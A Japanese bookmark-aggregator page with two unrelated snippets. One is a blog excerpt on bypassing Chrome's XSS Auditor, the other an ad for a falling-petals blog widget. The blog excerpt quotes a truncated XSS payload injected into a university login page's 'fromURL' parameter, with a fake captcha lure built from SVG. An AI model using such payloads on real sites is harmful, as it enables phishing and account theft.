素人がプログラミングを勉強するブログ
特に技術的に新しいものではないので公開せずに放置していたが、XSS Auditorをバイパスする方法はいろいろあるので気をつけましょうという話。 XSS Auditorをバイパスする方法は、Chrome XSS Auditor - SVG Bypass - Hack 2 Learnを参考にした(最新版ではすでにこの手法は塞がれた)。 実演と解説 見た方がわかりやすいと思うので、動画にしたので見てほしい。 これはある大学のログイン画面に存在するXSSで、 login.php?fromURL=xxx">Please complete the captcha before proceeding.<br><svg width=242px height=65px><a><image href=https://i.imgur.com/6W1W2jE.png/><animate attributeNam
ブログパーツ「フルフル」
ブログパーツ フルフル(furu2.jp)、ブログ内へ桜や雪を降らせるデコレーションブログパーツフルフルって何だろう? フルフルは、あなたのブログに掲載するだけで、このホームページのように「サクラ」を降らすことができるブログパーツです。 落葉・雪・流れ星・トンボ・ホタル など季節に合わせ様々なものを降らせることも出来ます。ぜひあなたのブログに花を添えてくださいね。 SAMPLE 左のアイコンをクリックすると「フルフル」を変えることが出来ます。 パスワードは2394です。 WHAT'S NEW 2007/3/28 ブログパーツ フルフルのサービスを開始いたしました。
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
